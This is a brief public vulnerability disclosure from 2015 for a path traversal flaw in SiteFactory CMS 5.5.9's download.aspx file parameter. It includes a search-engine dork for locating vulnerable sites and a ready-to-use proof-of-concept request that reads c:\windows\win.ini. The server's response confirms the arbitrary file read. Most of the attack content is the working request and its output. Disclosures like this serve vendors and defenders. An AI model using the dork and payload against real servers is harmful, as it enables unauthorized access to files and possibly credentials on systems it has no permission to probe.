||||||||||||||					[+] Title: SiteFactory CMS 5.5.9 Path Traversal File
           =              \       ,				[+] Date: [19-8-2015]
           =               |					[+] Autor Guillermo Garcia Marcos 
          _=            ___/					[+] Vendor: http://www.mindbite.se/
         / _\           (o)\					[+] Dork : inurl:/sitefactory/assets/
        | | \            _  \					[+] info: The file parameter is vulnerable to path traversal attacks,
        | |/            (____)						  enabling read access to arbitrary files on the server.
         \__/          /   |						  Latest versions can be vulnerable.
          /           /  ___)					[+] Timeline research:
         /    \       \    _)                       )			18-8-2015: Bug found
        \      \           /                       (			19-8-2015: Public disclosure
      \/ \      \_________/   |\_________________,_ )
       \/ \      /            |     ==== _______)__)
        \/ \    /           __/___  ====_/
         \/ \  /           (O____)\\_(_/
                          (O_ ____)
                           (O____)
[+]PoC:

	Request :

GET /sitefactory/assets/download.aspx?file=c%3a\windows\win.ini HTTP/1.1
Host: censored-host.com

	Response:

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/octet-stream
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
content-disposition: attachment; filename=win.ini
X-Powered-By: ASP.NET
Date: Tue, 18 Aug 2015 17:58:14 GMT
Content-Length: 92

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1


 

// https://twitter.com/GuilleSec